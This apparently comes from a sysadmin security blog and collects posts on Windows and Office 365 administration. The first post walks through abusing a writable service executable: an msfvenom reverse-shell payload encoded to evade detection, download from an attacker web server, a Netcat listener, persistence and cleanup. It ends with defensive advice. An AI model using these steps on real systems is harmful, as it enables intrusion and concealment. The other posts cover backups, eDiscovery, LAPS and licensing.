Abusing Insecure Services to Gain Privilege Escalation and a Remote Shell

With each story of a new, brazen attack on an enterprise or government network by some “sophisticated” threat actor using “novel techniques”, the Twittersphere and public media outlets get whipped up into a fear induced frenzy. Questions about losing some kind of technology skills arms race and trendy new memes fly around the internet faster than any of us can keep up with. Let’s take a moment to look into a method these “sophisticated” attackers use to elevate and maintain access in their victims’ networks, then using this example, outline what we good guys need to do to make life difficult for those trying to exploit this attack vector.

Establishing a Foothold and Performing Reconnaissance

Attackers most commonly gain a foothold by abusing cloud services and pivoting to remote access, phishing, or just a good ole’ fashioned web drive-by. The method really doesn’t matter because the reality is, everyone clicks. Eventually, someone in your network will be lured into opening an attachment or clicking on a link and they will be compromised, and we can’t stop that.

Once the vulnerable user’s system has been compromised attackers will start to dig for information to discover the rest of the network and identify systems of interest. Once they gain access to one of these systems by exploiting a vulnerability or leveraging stolen credentials the real fun starts. What’s the big deal, right? They were able to RDP or gain terminal access to a server, but they don’t have elevated permission to actually accomplish anything there. We’ll see about that.

Let’s take a look at all services running on the machine and which executable those services actually run, focusing on anything outside of the system directory. The goal here is to identify software that might have been installed in a directory that you actually have access to.

Now that we’ve got a list of potential targets, let’s review the permissions on those executables to see if we have access to change them using icacls. In this particular case, the logged in user has FullControl (F) to the executable and we’re in luck!

Then, from our attack machine (running Kali Linux in this case) we’ll use msfvenom to create a payload that will run a reverse shell once executed. A few things to note here; msfvenom is part of the metasploit framework and simplifies creation of malicious payloads. In this case we’re specifying that we want a reverse shell, which malicious host to reach out to, on what port, and that we want the shell encoded with shikata ga nai to help evade modern detection:

Then we’ll move it over to the html directory to be hosted by the local Apache web server. Apache is installed by default in Kali so there’s not much magic here.

Then, using PowerShell we’ll download the malicious payload from our Apache instance. Note that we’re using powershell because it’s native to Windows and this method works because unfortunately, administrators often don’t restrict internet access to known good endpoints:

Remembering that our end goal is to abuse an insecure service to gain remote access and an elevated command shell, let’s take the known good executable run by the vulnerable service and rename it. We want to keep it around so we can clean up after ourselves later and hide that we were ever there!

And finally, we copy our malicious payload over to replace the original:

Great! Now, when the service restarts it’s going to execute our malicious payload and will reach out to the IP that we’ve specified to establish a remote shell, running with the permission that the service itself runs as… NT Authority\System!

And of course, on the other end, we need to have something listening to pick up the shell! Using Netcat we’ll open a simple listener, listening on the port that we specified when we created the malicious payload. With the Netcat listener in place, we’ll reboot the target machine to get the service to restart and for our payload to execute. With the shell established we can use ‘whoami’ to confirm that we’ve got elevated permissions on the target machine:

Finally, using our elevated access let’s create a little persistence with our remote shell before rolling back the changes to our vulnerable service and deleting the malicious payload to cover up and make it harder to see that we’ve been snooping around:

Why was this so easy and what can we do to protect from these types of attacks?

Well, the first and most obvious thing here is to make sure that our servers are only running software core to the functionality of the server. Leaving administrative tools in place leave a vulnerable footprint attackers can easily exploit. Tools like Wireshark or VMWare Tools can make administrative work more convenient, but often go unpatched and make our lives more difficult in the long run.

Obviously we need to patch our systems. But that doesn’t just mean Windows patches, that means EVERY piece of software on the system. Public exploit databases make software running on your servers a menu of juicy targets. Our vulnerable service may have been fixed in a recent patch!

Then finally, our servers should not be able to reach out to internet locations that are not explicitly trusted. Known public cloud services, windows update, threat monitoring tools, or any other cloud hosted management services should be the only place that servers are able to access. Initial access would have been significantly more complicated, and our reverse shell would not have worked at all in this case.

Protect Yourself From Ransomware With Azure System State Backup

With 2020 came a seemingly biblical stream of plagues. Obviously Covid-19, Murder Hornets, Social Unrest, and… Ransomware. Sure, ransomware isn’t a terribly new concept, but this year the ante has been upped significantly by the bad guys. Not only have crime groups become more brazen, they’re demanding far bigger ransoms causing cyber insurance companies and their unfortunate customers to struggle.

There are a million things that companies need to consider when it comes to protecting their infrastructure from ransomware, and maybe we’ll dive in a little further later, but today we’re going to spend some time talking about what you can do to make sure that you’re able to recover when every domain controller in your organization has been paved over with ransomware or destructive malware.

As you scream ‘But I have backups!’, you might want to stop for a second and think about those backups. Are they performed with an account that has access to everything else (I hope not)? Are the backups themselves stored in a place that’s susceptible to being encrypted? And how long will it take you to actually restore those backups?

Azure System State Backup

Taking advantage of Azure System State Backup is a great way to handle those concerns. The primary benefits here are that this solution involves a simple agent installed on a domain controller, doesn’t involve credentials of any kind, the backups are stored in an offsite location, and those backups are protected from tamper with a host of enhanced security features.

So let’s talk about configuration. Since we’re talking configuration of a critical resource, from a PAW (you ARE using PAWs, right?), we need to make sure that a recovery services vault is available in Azure.

Then, in that recovery services vault we’ll configure a backup:

Since a domain controller backup only involves the system state, it’s a simple configuration. A system state backup will ensure that Sysvol and registry configurations are retained.

then, when prompted, download the MARs agent and move it to the domain controller and start the install. The agent requires Visual C++ Runtime so if it’s not already installed, setup will take care of that for you.

then select where you’d like the agent to be installed:

Backups are shipped to Azure with encrypted, outbound connectivity initiated by the MARs agent. If you’d like to proxy that connectivity configure it next.

Make sure that the agent is configured to be able to update itself moving forward:

Then, finish the installation and the agent will prompt you to register it.

To register the agent you’ll need to go back to the backup that you configured in Azure and in the properties of the backup, ensure that you’ve declared you’re using the latest MARS agent, download the backup credentials, and transfer them to the Domain Controller you’re working on.

Select the previously exported credentials and move forward:

Next, you’ll need to generate a passphrase that will be used when restoring the backup. You can either specify your own, or let the setup generate one for you. Select Browse and specify where you’d like to export that passphrase. This needs to be protected because you won’t be able to restore if the secret is lost. Azure Key Vault (which we’ll talk about on a later date) is a great option here.

Now that registration is complete, you’ll want to schedule your backups. Open the Azure Backup agent and on the right side, select ‘Schedule Backup’.

Since we’re only backing up the system state, select ‘Add Items’ and ‘System State’.

Finally, ensure you’re taking daily backups and we’ll take a look at retention of those backups.

Retention depends entirely on your RTO/RPO strategy, but typically restoring a a domain to a point too far in the past has little value at all. I’ve chosen to perform daily backups and retain them for 14 days, but you might find it more reasonable to only maintain 7 days of daily backups, and maybe 4 single weekly backups to be used in fringe cases.

Finally, we confirm that the schedule is what we need it to be and move forward through the setup.

So there you have it. Nothing complicated at all and there are a handful of topics touched on that we’ll pick up later, but we’ve done some good work! Often, people use complicated or expensive backup/storage solutions that put them at risk for credential theft or data destruction in worst case scenarios. Azure System State Backup is neither expensive or complicated, but it ensures that you’ll be able quickly and confidently recover from disaster.

eDiscovery in Office 365

Now that we’ve spent a few minutes to go over data retention and destruction in the service to make sure you’re retaining the data that you’re obligated to keep, let’s take a bit of time to make sure you’re able to quickly and reliably identify information. Why? Because there are times where you’ll need to export copies of data for legal reasons, delete phishing attempts, or just to find out if a message was read by someone.

I’ll spend time outlining PowerShell syntax in the examples here to help cut down on human error. Most people who are adverse to using the command line are usually uncomfortable because the syntax is difficult to remember or the process seems more arcane. It’s often beneficial to leverage the shell for discovery to enable you to be more granular with your searches in order to reduce the cost of first pass litigation by outside council (the numbers are scary). It also allows you to efficiently document the search syntax to ensure reliable internal knowledge transfer and simplify repeated searches by allowing the individual performing the search to copy/paste the actual search commands.

Before you’ll even be able to connect to the service via PowerShell you’ll need to make sure that you have the right level of permission. With RBAC (Role Based Access Control) it’s possible to scope permissions within the compliance center to allow only eDiscovery to individuals who may not need access to things like email security settings or the audit log. In most cases, the eDiscovery Administrator role will be enough for discovery activities, but if those individuals also need to be able to purge data they’ll also need to have the “Search and Purge” role assigned which is only part of the Organization Management role by default. A little more information on those permissions can be found here and a quick reference on how to assign role group members to a role is included there as well. And since it’s easy for an attacker to use eDiscovery to exfiltrate data, don’t forget to make sure that individuals with eDiscovery permission are required to use multifactor authentication as well!

Now that you’ve got the permissions taken care of and we’ve touched on ensuring MFA is enabled, you’ll need to connect to the security and compliance center using the Exchange Online PowerShell module. Once the module is installed, it’s just a simple one line command to connect.

Connect-IPPSSession -UserPrincipalName matt@collab-crossroads.com

Once you’re connected, the syntax is simple. We’ll be working with

New-ComplianceSearch
command to identify the potentially malicious message below:

The search syntax is simple. We know the message we want to identify was sent on 4/4 and has ‘Test’ in the subject and body. We’re not sure who else might have gotten this particular message that we want to remove so we’ll check every mailbox in the organization using ‘All’ for the Exchange location. The search is boolean so there are a couple gotchyas every now and then. In this case, note the parenthesis around the sent and receive dates. We need to make sure that those are considered first, so we put them in a block before moving on to the less complicated key word search in the subject. We won’t get into complexities of script blocks, but in our case just know that it’s just like simple math; we calculate what’s in parenthesis first before moving on to the rest.

New-ComplianceSearch -Name "Test Search" -ExchangeLocation all -ContentMatchQuery '(sent>=04/01/2019 AND sent<=04/05/2019) AND subject:"Test"'

Once you’ve created the search, start it using:

Start-ComplianceSearch "Test Search"
Depending on how complex the search is it might take a while to complete. In our case it’s a single message in a single mailbox so it completes very quickly and you can see the results using:
Get-ComplianceSearch "Test Search"

There are a number of really handy metrics that Exchange will report on that you might be interested in from time to time. The obvious ones are who started the search, is it completed, how long did it take, and how many items did we find?

If you pipe the Get-ComplianceSearch command to FL it will format the results in list form and show you everything that you can select from. Since we only want a subset of these results you can select specific items in results of the previous command.

Now that we’ve confirmed the results are what I was looking for we can choose to take action on those results using the New-ComplianceSearchAction command. Before choosing to delete anything always make sure to preview and export a copy:

A couple things to note here, first we’re deduplicating results in the export using the -EnableDedupe parameter. Next, we’re choosing to export a PST per mailbox that the results are in using the -ArchiveFormat parameter. Since the compliance center temporarily stores the export in Azure blob storage, it’s not possible to actually download the export through PowerShell so we’ll go into the compliance center to actually download the report. Under Search and Investigation and Content Search you’ll see the search we just created. Selecting the Exports tab will show the export as well:

Since Google deprecated ClickOnce you’ll need to use Internet Explorer to install the small agent required to download the export. Once clicking the “Download results” button within the export request you’ll be prompted to install the agent. Then you’ll be prompted for the export key shown below as well as an export location to save your export.

Now that we’ve made sure that we’re deleting the right content and have a copy of that content, let’s go ahead and delete it. The New-ComplianceSearchAction command will be used here as well.

 New-ComplianceSearchAction -SearchName "Test Search" -Purge -PurgeType SoftDelete -confirm:$False 

After verifying that the action was completed using the Get-ComplianceSearchAction command, you can see that the message in question was indeed removed:

In this scenario we focused on deleting a potentially malicious email (phishing, malware, or malicious insider) from a mailbox. The process of exporting data for a litigation search is identical, with the exception that you’re not actually deleting the data. Next time we’ll take a look at using the threat explorer to accomplish the same activity!

Data Retention and Destruction in Office 365

As organizations continue to invest heavily in cloud collaboration, the amount of information maintained in the form of documents, emails, or instant messages can balloon rapidly. Moving that data into a single space like Office 365 is a huge win in terms of discovery for admin and litigation teams, and usability for end users, but the incredible amount of space available to users means there’s a larger burden on administrators to ensure that data is both discoverable, and destroyed when it becomes older than the organization’s legal compliance period.

The first part of this is simple. You need to make sure that data retention is configured for your organization. Not only is this handy to meet your compliance requirements, it helps with overcoming the ‘oops’ moment for end users when they accidentally delete data, it enables you to take advantage of inactive mailboxes to save licenses, and it helps recover from malware in your tenancy by leveraging versioning in OneDrive and Teams.

To quickly enable retention, head to the security and compliance center and select ‘Retention’ from the Data Governance panel.

Retention_Nav1

When you elect to create a new policy you’ll be prompted to name your policy and identify exactly what you’d like your policy to do. In this case, we’re electing to retain data for seven years and also delete it after that duration. Depending on your requirements you may opt to maintain the data indefinitely without deleting it, or have a pure data destruction policy which deletes all data after a certain period of time. Note that the advanced options allow you to target specific data types such as personally identifiable information and financial information based on global standards. Additionally you can create your own data tags or policies to enforce there as well if you have a special requirement.

Retention_Nav3

Now that you’ve clarified how long you’d like to keep your data and if you’d like it purged after that period, you need to identify which data locations you’d like to apply that policy to. Note that you’ll need to create two retention policies, one for default locations like OneDrive, Exchange, and Sharepoint as well as a dedicated one for Teams chat and channel chat since Teams stores that data in an Azure chat service.

Retention_Nav4

Now that we’ve ensured that we’ve got our bases covered in terms of data retention we’ll circle back soon to discuss eDiscovery practices, search and destroy of malicious content, as well as leveraging the Threat Explorer in the compliance center to make that process easier.

 

So it’s 2019, and we’ve got phishing well in hand. Right?

Let’s face it, phishing is not new and forms of social engineering have been around for as long as we’ve been trying to protect information on the internet. Anyone who’s responsible for protecting their organization’s users from unsolicited spam or social engineering can tell you that phishing is definitely still occurring on a regular basis. What many organizations today don’t realize, is that not only is phishing still occurring, it’s becoming more complex, occurrences are increasing at an alarming rate, and users’ behavior is not changing at the same pace.

People Click Links

I had a great opportunity to hear a couple of my peers speak recently and they referenced Verizon’s Data Breach Investigations Report (DBIR) from 2018 and pointed out a few alarming trends. Phishing_Industries

First, let’s start with the scary one; sanctioned phishing campaigns uncovered that a small subset of individuals click on literally every link they get in their inbox:

“Unfortunately, on average 4% of people in any given phishing campaign will click it”

Phishing_ClickRate

Ok, so it’s only 4%. That’s not that bad, right? Well, consider a couple things; first, that individuals who have clicked on links in the past are far more likely to continue that trend, and that 4% of some of the largest organizations turns out to not be a trivial number at all. Walmart? 2.3M employees. JPMorgan? 256k employees. I wrote recently that a single compromised user gives an attacker a foothold in your organization and is often the start of most major data breaches.

So now that we know some individuals are susceptible, let’s take a look at the brighter side of that number; almost 80% of all users never click on a single link at all.

Reporting Incidents

It’s not a huge secret that today vendors rely heavily on samples being reported in order to improve detection rates. What is pretty interesting is that a vast majority of phishing campaigns go unreported, with only 17% being reported at all. This means that you have no idea how effective you are at blocking those messages inbound and that there are plenty of instances where potentially malicious content has been viewed inside your organization and you have no idea.

Phishing_Reporting

Bringing it All Together

Now that we’ve got a little transparency into some raw numbers, let’s spend a minute on a more positive note and outline some great features available to help combat the knowledge gap in end users and the drastic increase in inbound phish attempts.

Microsoft’s Security Intelligence Report outlines the increase in phishing messages their service identifies. They handle over 470 billion messages per month and saw a 250% increase over the span of 2018.

Phishing_Rates

As phishing campaigns become more and more complex, so has the way service providers protect their end users from 0 day threats. Microsoft leverages the sender side signals of those 470 billion messages to develop a user first contact graph to leverage machine learning for impersonation protection. On top of that, ATP adds SafeLinks and Safe Attachment protection for Office. The technology proxies every single end user click through a Microsoft server to validate the target URL before directing the user there.  The cool thing about that statement? SafeLinks works in Office, including Office Mobile for your remote users. URLs embedded in attachments are equally protected.

Microsoft certainly isn’t the only provider who’s making great strides on the email front; vendors like ProofPoint, FireEye, Palo Alto, Menlo, etc. have all innovated in their own right as well. The thing that sets Microsoft apart is that they handle exponentially more mail than all other vendors and leverage machine learning and artificial intelligence to make use of that data to exponentially improve protection for their users.

Keep up the Good Fight

Unfortunately the world isn’t going to become a peaceful place overnight and people aren’t going to suddenly become benevolent to their neighbors. While I’ll keep waiting for that day to come and doing my part to see it to fruition, I’ll also work just as hard to stay on top of emerging trends to make the internet a safer place for everyone to learn, collaborate, and enjoy a bottomless sea of cat memes.

Big thanks to Cam and Daniel for sharing sources for data.

 

 

Unique Local Admin Passwords – How and Why.

So here we are, early 2019 and just a few months removed from a data breach at Marriott that saw over 500 million guests’ personal information hit thSecurity_Oopsiese public internet. If that sounds like an insane number you’re absolutely right! That’s nearly 6% of the world population and about 150% the population of the US.

So the big question is how. How do things like this happen, how do attackers gain so much information, how do they exfiltrate the data, and how is it so common that Forbes is over here making cyber predictions for 2019!?

A while back I wrote about securing privileged access with a brief, high level overview of how an attacker will work to gain access in an organization and work to keep it. Part of that process is by making use of local admin credentials harvested from the first compromised machine to pivot around the network to see what else those credentials will work on. Sounds harmless enough, but what if the machine they gain access to is a domain controller? Or an admin’s workstation who happens to have administrative privileges on his daily account?

Security_killchain

During this process it’s difficult to detect because the attacker is using valid credentials to pivot around the network digging for more information or waiting for an admin to slip up. The first step to stopping this is by attacking the first link in the kill chain and limit privileged escalation of other workstations. How? By making sure that other workstation doesn’t have the same administrative password as the one the attacker already has.

Enter LAPS! The first part of the solution involves deploying an agent to each workstation and server on the network. That agent can be downloaded here. Since Microsoft was kind enough to provide the package as an MSI it’s easy enough to deploy with a script (msiexec /i \\fileserver\share\LAPS.x64.msi /quiet), Intune if you’re into comanagement, or good ole’ fashion SCCM. Definitely be sure to update your images to include the agent as well! Once that’s deployed and imaging has been updated, admin users need to install the management client on their PAWs (you are using a privileged access workstation, right?) to get the management client, powershell module, and GPO templates for management.

LAPS_AdminInstall

The next step is to make sure that the Active Directory Schema is taken care of. We need to extend the schema to include the attributes that we’ll be working with and then make sure to update permissions so we’ve accounted for users who shouldn’t be able to see those attributes. To extend the schema we need to use one of the admin workstations we just installed the management tools on and import the module in a powershell session and update the schema:

Import-module AdmPwd.PS
Update-AdmPwdADSchema

LAPS_SchemaExtension

After waiting a short while for that schema change to replicate we’ll move on to making sure only specific users and computers have access to the AD attribute that now stores these passwords. The first step is to remove permissions for groups at the OU level. If you’ve blocked inheritance you’ll need to make sure to take care of any nested OUs as well.

  1. Open ADSIEdit
  2. Right Click on the OU that contains the computer accounts that you are installing this solution on and select Properties.
  3. Click the Security tab
  4. Click Advanced
  5. Select the Group(s) or User(s) that you don’t want to be able to read the password and then click Edit.
  6. Uncheck All extended rights

*Be sure to preview all extended rights permissions first to make sure you aren’t removing permissions required by that group of users

LAPS_Security1

Now that we’ve taken care of scoping away permissions from unintended users/computers, we need need to make sure that the machines themselves have access to write to this attribute so they’re able to update their own passwords as they expire.

Set-AdmPwdComputerSelfPermission -OrgUnit "OU=Servers,DC=domain,DC=com"

LAPS_Security2

We’ll grant individual admin groups access to read those randomized admin passwords:

Set-AdmPwdReadPasswordPermission `
-OrgUnit "OU=Admins,DC=domain,DC=com" `
-AllowedPrincipals Domain\PasswordAdmins

And of course we need to account for password resets as well so let’s add reset permissions:

Set-AdmPwdResetPasswordPermission `
-OrgUnit "OU=Admins,DC=domain,DC=com" `
-AllowedPrincipals Domain\PasswordAdmins

Finally, you’ll want to hop into Group Policy on that admin workstation you installed the tools on to establish the password policy settings you’ll be enforcing on those workstations and servers.

LAPS_GroupPolicy

There’s quite a bit here to chew on but it’s not technically challenging so give it a try in a lab, then roll it out to your user workstations and eventually the servers as well! Again, the idea here is to limit lateral movement and make elevation of privilege more and more difficult for bad actors.

We’ll have another shorter session to go over some of the day to day admin tasks like looking up those passwords and resetting them, but that day is not today!

Securing Privileged Access – Part 1

After a little bit of a holiday hiatus we’re back to start a segment on securing privileged access. When we refer to privileged access we’re talking about everything from the different levels of administrative access, to privileged users who might handle extremely sensitive data for your organization.

So many organizations still believe that traditional firewalls are enough to keep the big, bad internet at bay. Well, in the modern enterprise it’s foolish to believe that you’re able to keep your data within any boundary while your users begin to work remotely, leverage third party SaaS storage (Dropbox, Google Drive, OneDrive, etc.), or you begin to host your data in an enterprise cloud like Office 365. I’m not here to tell you that those firewalls aren’t absolutely necessary, but it’s important to realize that the days of recognizing your firewall as the security boundary are over and you need to work hard to secure identity, regardless of where your data is hosted.

Recognizing that, let’s take a look at how a typical credential theft takes place in an organization:

Privsec_CredentialTheft

An attacker is going to establish a foothold in your organization by targeting end users with social engineering or phishing attacks. Once they’ve got access to that user’s computer they’ll start working on lateral movement, meaning that they’ll begin reaching out to other computers or servers on the network to see what else can be compromised. Maybe it’s by exploiting non unique local admin passwords, maybe the originally breached user has access elsewhere, or maybe an admin isn’t using a separate account for admin activities. Pivoting further and further until control of the directory database is gained (through actual domain admin permissions, by exploiting misconfigurations, or server agent configuration).

Privsec_Stage1

The first step is a simple one, and to many organizations it’s already very well ingrained in IT culture. Administrators need dedicated administrative accounts that are not shared with any other admins. I work with too many customers where this isn’t that case. Some have a generic account with domain admin that’s used for automation or just ‘general use’, or they flat out grant admin permission to their day to day account. Admin roles in your org should be reported on regularly to identify these and there should be alerts for elevation of privilege with an actual process for following up on those.

The next steps are again, not technically challenging but require culture change that many admins are adverse to. Privileged Access Workstations need to be deployed for users owning high value admin roles, and unique local admin passwords need to be deployed to workstations first and finally servers to help stop lateral movement. I’ll reach back to these two topics later with dedicated articles, but for now; know that it needs to be accomplished and needs to be prioritized.

Now that we’ve touched on high level goals of attackers and the first steps required to secure privileged access, I’ll follow up soon with part two. I’ll be working through Microsoft guidelines published here so definitely feel free to read ahead a little and ask questions!

Implementing Group Based Licensing in Office 365

So here we are on election day and if you’re like me, you’re probably more than a little bit ready to think about something other than someone else’s political opinion. Well, here I am to help you out with a little diddy on licensing your users in Office 365.

Since managing licenses for thousands of individuals can become a struggle, most organizations will use some kind of automation. Something like the sample below can be scheduled to run and apply licenses with specific features based on a specific scenario. This works great if you don’t have any other options, but group based licensing doesn’t require any kind of on premises (or Azure) automation so if you’ve got licensing for it, definitely use it!

if($_.UserPrincipalName -like *@domain2.com”) { 

# Disabled Plans – Customize to meet the needs of AA 

 $DisabledPlans= @() 

 $disabledPlans +=“Stream_O365_E3” 

 $disabledPlans +=“TEAMS1” 

 $disabledPlans +=“DESKLESS” 

 $disabledPlans +=“FLOW_O365_P2” 

 $disabledPlans +=“POWERAPPS_O365_P2” 

 $disabledPlans +=“OFFICE_FORMS_PLAN_2” 

 $disabledPlans +=“PROJECTWORKMANAGEMENT” 

 $disabledPlans +=“YAMMER_EDU” 

 $disabledPlans +=“EXCHANGE_S_STANDARD” 

 $disabledPlans +=“MCOSTANDARD” 

Set-MsolUser -UserPrincipalName $_.UserPrincipalName -UsageLocation US 

 $AccountSkuId “org:LicenseName” 

 $Option New-MsolLicenseOptions -AccountSkuId $AccountSkuId -DisabledPlans $DisabledPlans 

 Set-MsolUserLicense -UserPrincipalName $_.UserPrincipalName -LicenseOptions $Option -AddLicenses $AccountSkuId 

}

Elseif ($_.UserPrincipalName -like *domain.com”) { 

 #Disabling only EXO for another business unit 

 $DisabledPlans= @() 

 $DisabledPlans +=“EXCHANGE_S_STANDARD” 

Set-MsolUser -UserPrincipalName $_.UserPrincipalName -UsageLocation US 

 $AccountSkuId “org:LicenseName” 

 $Option New-MsolLicenseOptions -AccountSkuId $AccountSkuId -DisabledPlans $DisabledPlans 

 Set-MsolUserLicense -UserPrincipalName $_.UserPrincipalName -LicenseOptions $Option -AddLicenses $AccountSkuId 

}

 

The struggle is that you’ll want to use a dynamic group to do it and it will require a filter to work. If you apply a dynamic group and the filter is wrong you might unlicense your users or overcommit, causing service disruption for those users. The first step is to determine which users will need which licenses. The easy ones that need to be considered are any users with mail hosted in Exchange Online that require licensing (everything but resource, shared, or discovery mailboxes). Those mailboxes will need to be included in the dynamic group we’ll create next, so let’s filter out everything else that needs to be excluded.

$Resources = Get-RemoteMailbox -resultsize unlimited | where {($_.RecipientTypeDetails -ne ‘userMailbox’) -and ($_.recipientTypeDetails -ne ‘DiscoveryMailbox’)}

 

Now that we’ve gathered what needs to be excluded from the group, let’s update any on premises attribute that’s replicated to Azure and can be filtered . I prefer to use ExtensionAttribute 1-15 if they’re available, but also leverage the ‘info’ attribute on premises so you can be granular with scripting logic later if you have to. In my case I chose to filter out anything with the word ‘Resource’ in ExtensionAttribute1:

$Resources| foreach{

[string]$upn = $_.userprincipalname

$user = Get-ADUser -Properties info,extensionattribute1,distinguishedname -filter {userprincipalname -eq $upn}

Since the info attribute is multivalued we’ll want to make sure we don’t bulldoze what’s already in the attribute before setting it. In this case I’m checking to see if there’s anything there and if there is, we’ll add ‘Resource’ on a new line in the same attribute.

if($user.info -eq $null)

    {

    Set-ADUser $Sam -Replace @{info=‘Resource’;extensionAttribute1=‘Resource’

    }

    Else{

        Set-ADUser $Sam -Replace {info=$($user.info)`r`nresource;extensionAttribute1=‘Resource’

        Set-ADUser $Sam -Replace @{info=“resource”;extensionAttribute1=‘Resource’}

        }

}

 

Great! Now that we’ve set an attribute to be excluded by the filter, let’s make the dynamic group in Azure to assign those licenses to. Since I’m a Shell kindof guy, here’s a sample to create the group.

New-AzureADMSGroup -DisplayName “Licensing – E3” `

-Description “Dynamic group created to automatically assign licenses to mail enabled users” `

-MailEnabled $False -MailNickName “group” -SecurityEnabled $True -GroupTypes “DynamicMembership” `

-MembershipRule “(user.mail -ne null) -and (user.AccountEnabled -eq True) -and (user.extensionattribute1 -ne ‘Resource’)” `

-MembershipRuleProcessingState “On”

 

Now that the more complicated portion of creating the dynamic group that fits your users, the last thing left to do is follow the simple documentation to assign licenses and features to that particular group.

Here’s to my favorite kind of people out there, those who know how to stuff the ballot box as well as their faces! #VotePizza #ChicagoStyle #LouMalnatti’s

VotePizza

Exchange 2019 – Why?

With the formal release of Exchange 2019 the Exchange world was shaken up (yet again), and the main question most of us have is why? Since upgrading Exchange in your environment isn’t exactly a small task, why should you jump to the new, fancy flavor? Well, let’s hop right into that!

Security

security

Exchange 2019 is the first flavor of Exchange that fully supports deployment on Windows Server Core. How’s that a security improvement? Well, since Core is lightweight, containing only the essentials, there’s a drastically reduced attack footprint.

Not sold on Core? How about this; Exchange 2019 out of the box will only use TLS 1.2.

Uptime

uptime

We talked about Core, right? Well since it doesn’t install features and components that are not absolutely necessary (Internet Explorer?, Media Player?) there are fewer patches to be deployed, and fewer still that require reboot. Assuming you follow the preferred architecture when you deploy there should be no problems with rebooting, but why chance it when you don’t have to?

Not only that, but with major enhancements to search indexing the catalog fails over much, much faster and who isn’t a fan of that?!

 

Performance

With Exchange 2016 there were scalability struggles. Manufacturers started producing larger physical servers and Exchange supportability flat out didn’t cover those, which lead to complicated virtual deployments and customers working outside of supportability guidelines. Exchange 2019 now supports up to 48 (physical) cores and 256GB of RAM.

Search was also drastically changed to leverage Bing technology causing failovers will happen more quickly and reliably. How, you ask? By storing the search indexes within the databases themselves and changing index data to be shipped along with database log shipping.

SSDs! For the longest time they were supported, but not technically recommended due to cost and capacity. Well, the read latencies of spinning disks haven’t improved at the same pace as physical capacity did. The struggle here is that it’s tough to read TBs of data fast enough on disks that are only 7,200RPM. How was that addressed? MCDB (MetaCache DataBases)! Basically, part of the most actively accessed data is stored on the SSDs so it improves performance drastically. Since MCDB is entirely new and a little complicated I’ll come back later and write about it in detail soon.

EX2019_MCDBGains

Up next is a two part about preparation and installing!

Managing Major Changes to Office 365

Admins are expected to keep tabs on major changes to the service and understand how those could impact uptime, or just good ole’ fashioned end user experience. Unfortunately, there are hundreds of items coming down the pipe that may or may not be relevant to every organization and it’s difficult to follow it all.

The first part of making that manageable is understanding how Microsoft’s release options work. Updates are released to different update ‘Rings’ as the updates become more mature. The first three rings are Microsoft release teams where Microsoft consumes the updates first, prior to being formally released to the rest of the world.

M_O365_UpdateRings

After that, you can select to add friendlies to the targeted release group. These would typically be IT groups or power users who will be a little more adaptive to change. Here are a few of the benefits of making sure you have decision makers in the targeted release group:

  • Test and validate new updates before they are released to all the users in the organization.

  • Prepare user notification and documentation before updates are released worldwide.

  • Prepare internal help-desk for upcoming changes.

  • Go through compliance and security reviews.
  • Use feature controls, where applicable, to control the release of updates to end users.

Here’s how you can add individuals to targeted release.

Handy, right? Super common use case here; Teams were released about a year ago and most customers had no idea exactly how it would impact them or how their users would cope. The feature was added to enterprise licensing and enabled by default upon standard release. The trouble? End users were able to go to http://teams.microsoft.com and create a new one with any name and any picture which shows up in the address book with (at the time) no central management and can potentially be shared with the wide world of the internet. Mayyyybe you might want to review that feature to make sure you have controls in place that match your organization’s goals.

Facepalm

In addition to release options you’ll want make sure that your team is managing the message center for major updates.

M_O365_MessageCenter

Updates in the service come at you pretty fast, but Microsoft does a pretty decent job of providing information and allowing you to plan for them. Make sure you keep an eye on the roadmap, the message center, and of course make use of targeted release to find out how those changes will impact your users!

Now don’t mind me while I go drown myself in meaningless college football games!

Saturday